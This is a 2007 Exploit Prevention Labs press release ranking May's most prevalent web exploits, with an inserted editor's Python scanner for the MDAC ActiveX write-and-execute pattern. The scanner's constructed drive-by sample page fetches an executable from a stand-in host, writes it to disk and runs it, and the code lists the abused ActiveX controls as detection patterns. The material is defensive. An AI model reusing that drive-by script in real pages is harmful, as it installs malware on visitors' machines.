EXPLOIT PREVENTION LABS RELEASES MAY EXPLOIT PREVALENCE SURVEY

Modified MDAC and MPack Rise in Ranking, ANI Holds Steady

June 25, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), developer of the LinkScanner line of safe surfing software that protects against exploits, phishing, and other social engineering attacks, today released the results of its May 2007 Exploit Prevalence Survey™. Now in its thirteenth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by LinkScanner users combined with data collected from all levels of the company’s multi-faceted research network.

Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted steady activity among cybercriminals in May. For the third consecutive month since its release, the Modified MDAC exploit was among the prevalence survey’s top five most active exploits, this month once again claiming the number one position with 32.9 percent of all occurrences.

“Modified MDAC is demonstrating impressive staying power - it’s clearly proving a profitable exploit for the bad guys, despite the availability of a patch,” said Thompson.

May’s second most prevalent exploit was MPack, with 12.8 percent of all occurrences. MPack, originally named WebAttacker 2.0, was discovered in April and mimics the distribution model of earlier WebAttacker-driven exploits.

According to Thompson, MPack is a set of professionally written PHP scripts sold as a package of several different exploits that attack a wide range of unpatched systems. He suspects two of the most dangerous exploits in the package are the WinZip FileViewCtrl ActiveX DLL exploit, because WinZip users have no automatic update path to patch their systems, and the ANI exploit, because many IE users appear to be slow to patch.

“MPack is a strong exploit package,” Thompson said. “It’s being used for a lot of web site hacks, particularly small sites where the operators lack the security expertise of larger organizations. As long as there are inexperienced webmasters out there, this kind of exploit package will continue to spread.”

Tied with MPack for the number two position was March’s highly publicized ANI exploit, which, at the time of its release, compromised fully patched Windows XP SP2 machines running IE 6 or 7 by exploiting Windows’ handling of animated cursor (.ani) files. Microsoft released an emergency patch on April 3, but the exploit has continued to thrive on unpatched machines.

“ANI was a strong, fast-moving exploit,” Thompson noted. “Microsoft moved quickly to release an emergency patch, but its continued spread indicates that users are not patching their machines and leaving themselves vulnerable.”

The Q406 Roll-up package captured May’s number four spot, accounting for 6.8 percent of all occurrences. The package, which was discovered back in December and held the number one position on the survey for three straight months, consists of a dozen exploits including Setslice, MS07-004 and MS06-071.

Rounding out the top five was the IE Com CreateObject exploit, responsible for five percent of all reported occurrences. Like several other exploits, IE Com CreateObject has been patched since 2006 but continues to find victims.

Thompson notes that, unlike virus and worm writers of a few years ago who were focused on large-scale crippling of the Internet for the thrills, today’s malware distribution network is populated by cybercriminals out to maximize their profit while minimizing their visibility.

“They wait for the right moment - Patch Tuesday is usually one of those moments - and then launch smaller, more targeted attacks using proven exploits to attack unpatched systems,” Thompson said. “It’s vital for people to patch their systems regularly and use added protection like LinkScanner.”

Exploit Prevalence Results for the Month of May 2007
The following is a summary of the top five most-reported web exploits for May 2007:

Exploit: Modified MDAC
Rank last month: 2
Percent of overall occurrences: 32.90 percent (23.92 previous)
Description: MDAC refers to a creative method of using certain ActiveX controls in a context Microsoft did not originally intend. An ActiveX control is instantiated inside a web script that allows files to be written to disk and executed.

Exploit: MPack
Rank last month: 5
Percent of overall occurrences: 12.80 percent (9.10 previous)
Description: MPack is a set of professionally written PHP scripts that are being sold as a package and use similar distribution methods to earlier WebAttacker output. Hackers can purchase the package on underground markets and use it just like commercial software. The two most dangerous exploits inside the package are believed to be the WinZip FileViewCtrl ActiveX DLL exploit and ANI.

Exploit: ANI
Rank last month: 4
Percent of overall occurrences: 12.80 percent (11.90 previous)
Description: Originally discovered and used by a group of Chinese hackers, the exploit takes advantage of Windows’ handling of animated cursor (.ani) files. At the time of its release into the wild, the ANI exploit infected fully patched Windows XP SP2 machines running IE 6 or 7. Microsoft released an emergency patch on April 3, but the exploit continues to attack unpatched machines.

Exploit: Q406 Roll-up package
Rank last month: 2
Percent of overall occurrences: 6.80 percent (9.33 previous)
Description: Comprising up to a dozen exploits including Setslice, VML, XML and IE COM CreateObject Code, the package is usually heavily encrypted.

Exploit: IE COM CreateObject code
Rank last month: 16
Percent of overall occurrences: 5.00 percent (0.08 previous)
Description: IE COM CreateObject was originally released in August 2006 as a proof of concept. The exploit creates a COM object in a mode that was never anticipated by Microsoft. Although the mode was intended for some useful purposes, the functions it enables, such as saving files to disk or executing a file already on disk, are dangerous in the hands of a cybercriminal.

Note: The numbers above do not add up to 100 percent because of the following lesser-reported exploits: TROJAN FAKE CODEC (4.40% vs. 3.27%), WMF (CVE-2005-2124) with known payload (4.20% vs. 2.45%), Search engine hijack (4.0% vs. 2.1%), others (17.1%).
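The Modified MDAC and IE COM CreateObject entries above describe the same pattern: script on a web page instantiates an ActiveX control that can write a file to disk, and then runs it. The scanner below, added here as an editor's example and not code from Exploit Prevention Labs or any LinkScanner product, flags pages whose script combines those two capabilities. The ProgIDs it looks for (ADODB.Stream, Microsoft.XMLHTTP, Shell.Application, WScript.Shell) are the editor's assumption about which controls were being abused; the press release does not name them. Both sample pages are constructed, and the CLSID in the second one is an all-zero placeholder rather than a real control.

```python
import re

# ProgIDs assumed to be the "certain ActiveX controls" the survey refers to;
# the press release does not name them (editor's assumption).
DOWNLOAD_PROGIDS = {"microsoft.xmlhttp", "msxml2.xmlhttp"}
WRITE_PROGIDS = {"adodb.stream"}
EXEC_PROGIDS = {"shell.application", "wscript.shell"}

# Two ways page script reaches a control: directly via ActiveXObject, or
# indirectly through the CreateObject method of an <object> already on the
# page (the "context Microsoft did not originally intend" in the MDAC entry).
ACTIVEX_RE = re.compile(r"""new\s+ActiveXObject\s*\(\s*["']([^"']+)["']""", re.I)
CREATE_RE = re.compile(r"""\.CreateObject\s*\(\s*["']([^"']+)["']""", re.I)
OBJECT_TAG_RE = re.compile(r"""<object\b[^>]*\bclassid\s*=\s*["']?clsid:""", re.I)
WRITE_CALL_RE = re.compile(r"\.SaveToFile\s*\(", re.I)
EXEC_CALL_RE = re.compile(r"\.(?:ShellExecute|Run|Exec)\s*\(", re.I)


def scan_page(html):
    """Return the instantiated ProgIDs, the capability signals seen in the
    page's script, and a verdict for one HTML page."""
    progids = {p.lower() for p in ACTIVEX_RE.findall(html) + CREATE_RE.findall(html)}
    signals = []
    if OBJECT_TAG_RE.search(html):
        signals.append("object-tag")          # a control embedded via <object classid=clsid:...>
    if progids & DOWNLOAD_PROGIDS:
        signals.append("download")            # script can fetch arbitrary bytes
    if progids & WRITE_PROGIDS and WRITE_CALL_RE.search(html):
        signals.append("write")               # stream control used to write a file
    if progids & EXEC_PROGIDS and EXEC_CALL_RE.search(html):
        signals.append("execute")             # shell control used to run a file
    if "write" in signals and "execute" in signals:
        verdict = "mdac-pattern"              # write-to-disk followed by execute
    elif "write" in signals or "execute" in signals:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"progids": sorted(progids), "signals": signals, "verdict": verdict}


# Constructed sample pages (not captured from any real site).
BENIGN_PAGE = """<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/feed.xml", false); x.send();
</script>"""

# The classid below is a placeholder, not a real control's CLSID.
DRIVE_BY_PAGE = """<object id="o" classid="clsid:00000000-0000-0000-0000-000000000000"></object>
<script>
var s = o.CreateObject("adodb.stream", "");
var x = o.CreateObject("Microsoft.XMLHTTP", "");
x.open("GET", "http://example.invalid/a.exe", false); x.send();
s.Type = 1; s.Open(); s.Write(x.responseBody);
s.SaveToFile("c:/a.exe", 2);
o.CreateObject("Shell.Application", "").ShellExecute("c:/a.exe");
</script>"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("drive-by", DRIVE_BY_PAGE)):
        print(name, scan_page(page))
```

The benign page uses only the download control and is reported clean; the drive-by page is reported as the MDAC pattern because it writes a file and then executes it. This only inspects plain source: the Q406 entry notes that real kits ship their pages heavily encrypted, so a scanner of this kind has to decode or render the script before matching.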

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Labs’ comprehensive Threat Center at http://www.explabs.com/ss/threatCenter.asp.

About the LinkScanner Family of Safe Surfing Software

Exploit Prevention Labs offers a range of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.

The LinkScanner family of safe surfing products includes LinkScanner Pro™, LinkScanner Lite™, and LinkScanner Online. LinkScanner Pro (free 15-day trial: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits for Windows 2000, XP and Vista users running IE or Firefox browsers. LinkScanner Lite (http://www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer and Firefox users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links.

LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.

About Exploit Prevention Labs
Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com